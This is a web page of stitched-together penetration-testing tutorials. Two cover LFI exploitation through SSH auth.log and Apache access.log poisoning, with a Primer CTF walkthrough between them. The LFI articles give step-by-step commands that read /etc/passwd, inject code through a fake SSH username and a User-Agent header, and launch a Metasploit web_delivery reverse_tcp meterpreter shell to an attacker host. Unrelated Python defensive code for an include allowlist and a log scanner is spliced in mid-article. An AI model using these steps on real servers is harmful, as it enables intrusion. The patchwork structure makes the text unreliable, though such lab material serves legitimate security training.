RCE with LFI and SSH Log Poisoning

In this article you will learn how to gain unauthorized access to a web server that suffers from a local file inclusion vulnerability, with the help of the auth log file. To perform this attack, please read our previous articles “Beginner Guide to File Inclusion Attack (LFI/RFI)” and “Configure Web Server for Penetration Testing (Beginner Guide)”, which will help you configure your own web server and learn more about the LFI vulnerability.

Attacker: Kali Linux
Target: Ubuntu

Let’s Begin!!

Create a PHP file which allows the user to include a file through the file parameter. Hence, using the file parameter, we can execute a file that contains malicious code to gain unauthorized access to the target PC. Download File from Here

I saved the PHP code given below inside a text file as lfi.php on the desktop.
Now log in as user “root” and create a folder “lfi” inside /var/www/html:
cd /var/www/html
mkdir lfi
Move the lfi.php file from the desktop into /var/www/html/lfi using the command given below.
mv /home/raj/Desktop/lfi.php lfi/

Since we have added a PHP file with an include function inside /var/www/html, which allows the contents of another file to be read through it, it can lead to an LFI attack. Let’s demonstrate it by browsing to the following URL to read the password file:

localhost/lfi/lfi.php?file=/etc/passwd
From the given image you can observe that the above URL has dumped the result shown below.

Open a terminal in your Kali Linux and connect to the target through the SSH service.
From the screenshot you can see I am connected to the target system.


Type the following command to view its logs:
tail -f /var/log/auth.log
From the image below you can check the details of the generated log entries in auth.log.


Now I will try to open the auth.log file through lfi.php in the browser; therefore give read and write permission to auth.log.
cd /var/log/
chmod 775 auth.log


Now include the auth.log file through the file parameter by giving the following URL in the browser.
192.168.1.129/lfi/lfi.php?file=/var/log/auth.log
From the given image you can see that the auth log entries are also shown in the browser.



The auth.log file records every successful and failed login attempt made when we try to connect to the server over SSH. Taking advantage of this, I will now send malicious PHP code as a fake username, and it will be appended automatically to auth.log as a new log entry.
ssh ’@192.168.1.129

When you check the log again, you will find the PHP code has been added as a new log entry.
Type the following command to view its logs:
tail -f /var/log/auth.log


Here it will dump the contents of auth.log as well as execute the command supplied through the c parameter; now pass ifconfig as the command to verify the network interface and confirm the result in the given screenshot.
192.168.1.129/lfi/lfi.php?file=/var/log/auth.log&c=ifconfig


If you find this kind of vulnerability in a web application, you can use the Metasploit framework to exploit the web server.
use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 1
msf exploit(web_delivery) > set payload php/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 192.168.1.123
msf exploit(web_delivery) > set srvport 8081
msf exploit(web_delivery) > exploit
Copy the highlighted text shown in the window below.

Paste the copied code into the URL as the command, as shown in the given image, and execute it.


When the above code executes, you will get meterpreter session 1 on the targeted web server.
msf exploit(web_delivery) > sessions 1
meterpreter > sysinfo


Hack the Primer VM (CTF Challenge)

Hello friends! Today we are going to take on another CTF challenge known as Primer. The credit for making this VM goes to “couchsofa”, and it is another boot2root challenge where we have to root the VM to complete it. You can download this VM here.
Let’s Breach!!!
Let us start by finding the IP of the VM (here I have it at 192.168.1.115, but you will have to find your own).

netdiscover

nmap -sV 192.168.1.115


We find that port 80 is open, so we open this IP address in our browser.


dirb http://192.168.1.115/ -w


Inside robots.txt we find a link to a page.


We open this link; it leads to a page that has a story written on it.


We take a look at the source code and find another link.


When we open the link we find another link on the page.


When we open the link, we are prompted for a password.


We capture the request for this page in Burp Suite and send it to Repeater. In the response from the server, we find another link.


When we open the link we find another page that prompts for a password.


Now we take a look at the URL; it looks like an MD5 hash, so we remove the leading part and the underscore and find something interesting.


We find that the URLs are actually prime numbers converted into MD5 hashes. We were at the 7th page, and the hash for that is 17. So we convert 19 (the next prime number) to an MD5 hash.




We take a look at the source code and find another URL.


We open it and find a custom-made terminal that uses JavaScript to execute certain commands.


In the ~/usr/falken/ folder we find a hint; when we take a look at the processes we find a command that we need to run.


When we run connect falken@Erebus it prompts for a password. We get a hint from the log files that the password might be related to Joshua. In the logs we find that his date of birth is 6th August 1984. We use cupp to create a dictionary file.


We use Burp Suite to brute-force the password, and we find that joshua1984 is the password.


When we log in, we again find a page with a terminal.




There we find our next clue; we googled “trivial zero” and found it was discovered by Riemann. We use cupp to create a dictionary with the given information.




When we log in we are again prompted with another terminal.

When we look through the files we find MD5-hashed strings for the usernames. We check the processes and again find a command.


When we crack the MD5 hashes, we find that they are the passwords for the respective usernames.

When we log in, we are again prompted with another terminal.


Looking through the files we find a username, password and hostname.


We use these to log in and find a page greeting us for completing the challenge.


Log Poisoning through LFI

In this article we demonstrate how a PHP file with an include function can lead to an LFI log injection attack on a web server. Please read our previous articles “Beginner Guide to File Inclusion Attack (LFI/RFI)” and “Configure Web Server for Penetration Testing (Beginner Guide)”, which will help you configure your own web server and learn more about the LFI vulnerability.

Attacker: Kali Linux
Target: Ubuntu

Create a PHP file which allows the user to include a file through the file parameter. Hence, using the file parameter, we can execute a file that contains malicious code to gain unauthorized access to the target PC. Download File from Here

Now I have saved the PHP code given below inside a text file as lfi.php on the desktop.


Now log in as user “root” and create a folder “lfi” inside /var/www/html:
cd /var/www/html
mkdir lfi
Move the lfi.php file from the desktop into /var/www/html/lfi using the command given below.
mv /home/raj/Desktop/lfi.php lfi/

Since we have added a PHP file with an include function inside /var/www/html, which allows the contents of another file to be read through it, it can lead to an LFI attack. Let’s demonstrate it by browsing to the following URL to read the password file:

localhost/lfi/lfi.php?file=/etc/passwd

From the given image you can observe that the above URL has dumped the result shown below.
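The fix for the include handler described above (the same handler is set up in the first article on this page), as an added example that is not the article's lfi.php: the file parameter is treated as a page name, checked against an allowlist and confined to one directory, so requests for /etc/passwd or a log file never reach include(). BASE_DIR and ALLOWED_PAGES are assumed values for the illustration.

```python
from pathlib import Path

# Added example of the fix, not the article's lfi.php. The article's handler
# hands the raw ?file= value to include(); this resolver instead treats the
# value as a page name, checks it against an allowlist and confines the
# result to one directory. BASE_DIR and ALLOWED_PAGES are assumptions.
BASE_DIR = Path("/var/www/html/lfi/pages")
ALLOWED_PAGES = {"home", "about", "contact"}


def resolve_include(file_param):
    """Map the request's file parameter to a path under BASE_DIR, or None.

    Anything that is not a known page name is refused, so absolute paths
    such as /etc/passwd or /var/log/auth.log and traversal strings are
    rejected before any file is opened.
    """
    if not isinstance(file_param, str) or file_param not in ALLOWED_PAGES:
        return None
    candidate = (BASE_DIR / (file_param + ".php")).resolve()
    # Defence in depth: the resolved path must still sit inside BASE_DIR,
    # which catches a symlinked page file or a later mistake in the allowlist.
    try:
        candidate.relative_to(BASE_DIR.resolve())
    except ValueError:
        return None
    return candidate
```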


Now I will try to open the Apache access.log file through lfi.php in the browser; therefore give read permission to the apache2 log directory and then include the access.log file.

Now include the access.log file through the file parameter by giving the following URL in the browser.

192.168.1.129/lfi/lfi.php?file=/var/log/apache2/access.log

From the given image you can see that the Apache log entries are shown in the browser. Now turn on Burp Suite to capture the request for the same web page.

Here you will get the intercepted data, where we need to inject our command inside the User-Agent header by replacing the highlighted data.
Add the command inside User-Agent and send the request with the GET parameter /lfi/lfi.php?file=/var/log/apache2/access.log&c=ps as shown in the image below. Then click Forward.
Here it will dump the log data as well as execute the command supplied through the c parameter. From the screenshot you can view both the log and the process list.
In the same manner execute ifconfig through the c parameter to verify the network interface, or browse to the following URL and view the result in the given screenshot.

192.168.1.129/lfi/lfi.php?file=/var/log/apache2/access.log&c=ifconfig
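As an added example that is not from the article, the detection side of both poisoning steps described on this page (the fake SSH username landing in auth.log, and the User-Agent landing in Apache's access.log, each then pulled in through the file parameter): it scans constructed sample lines in standard sshd and Apache combined-log format and flags PHP open tags in attacker-controlled fields and include parameters aimed at log or system files. The sensitive-path watchlist is an assumption.

```python
import re
from urllib.parse import parse_qs, unquote, urlparse

# Added detection example, not code from the article. The sample lines are
# constructed to mirror the two logs the article poisons (sshd's auth.log and
# Apache's access.log); the PHP tag in them is a harmless placeholder.
PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)
SSHD_INVALID = re.compile(r"sshd\[\d+\]: Invalid user (?P<user>.*?) from (?P<ip>\S+)")
APACHE_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Prefixes an include parameter should never point at (assumed watchlist).
SENSITIVE = ("/etc/", "/var/log/", "/proc/")

SAMPLE_AUTH = """\
Dec 10 12:00:01 ubuntu sshd[1234]: Invalid user <?php echo 'poisoned'; ?> from 192.168.1.123
Dec 10 12:00:02 ubuntu sshd[1234]: Failed password for invalid user raj from 192.168.1.123 port 40122 ssh2
"""
SAMPLE_ACCESS = """\
192.168.1.123 - - [10/Dec/2017:12:00:05 +0000] "GET /lfi/lfi.php?file=/etc/passwd HTTP/1.1" 200 1842 "-" "Mozilla/5.0"
192.168.1.123 - - [10/Dec/2017:12:00:09 +0000] "GET /lfi/lfi.php?file=/var/log/apache2/access.log&c=ps HTTP/1.1" 200 9120 "-" "<?php echo 'poisoned'; ?>"
"""

def scan_line(line):
    """Return (rule, evidence) findings for one auth.log or access.log line."""
    findings = []
    m = SSHD_INVALID.search(line)
    if m and PHP_TAG.search(m.group("user")):
        # Username field carried PHP source: the auth.log poisoning step.
        findings.append(("sshd-username-php-tag", m.group("ip")))
    m = APACHE_LINE.match(line)
    if m:
        # User-Agent and Referer are attacker-controlled and land in access.log.
        for field in ("ua", "referer"):
            if PHP_TAG.search(m.group(field)):
                findings.append((f"apache-{field}-php-tag", m.group("ip")))
        target = unquote(m.group("target"))
        if PHP_TAG.search(target):
            findings.append(("apache-target-php-tag", m.group("ip")))
        # An include parameter aimed at a log or system file is the read step.
        for value in parse_qs(urlparse(target).query).get("file", []):
            if value.startswith(SENSITIVE) or ".." in value:
                findings.append(("lfi-sensitive-include", value))
    return findings

def scan_log(text):
    """Scan a whole log body; findings come back in order of appearance."""
    return [f for line in text.splitlines() for f in scan_line(line)]
```

Running scan_log over a live auth.log and access.log in the same way gives an alert on the poisoning write and on the include read, whichever happens first.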
If you find this kind of vulnerability in a web application, you can use the Metasploit framework to exploit the web server.

This module quickly fires up a web server that serves a payload. The provided command will start the specified scripting language interpreter and then download and execute the payload. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command himself, e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege escalations supplied by Meterpreter. When using either of the PSH targets, ensure the payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines.

use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 1
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 192.168.0.104
msf exploit(web_delivery) > set srvport 8081
msf exploit(web_delivery) > exploit

Copy the highlighted text shown in the window below.

Paste the copied code into the URL as the command, as shown in the given image, and execute it.
When the above code executes, you will get meterpreter session 1.

msf exploit(web_delivery) > sessions -i 1
meterpreter > sysinfo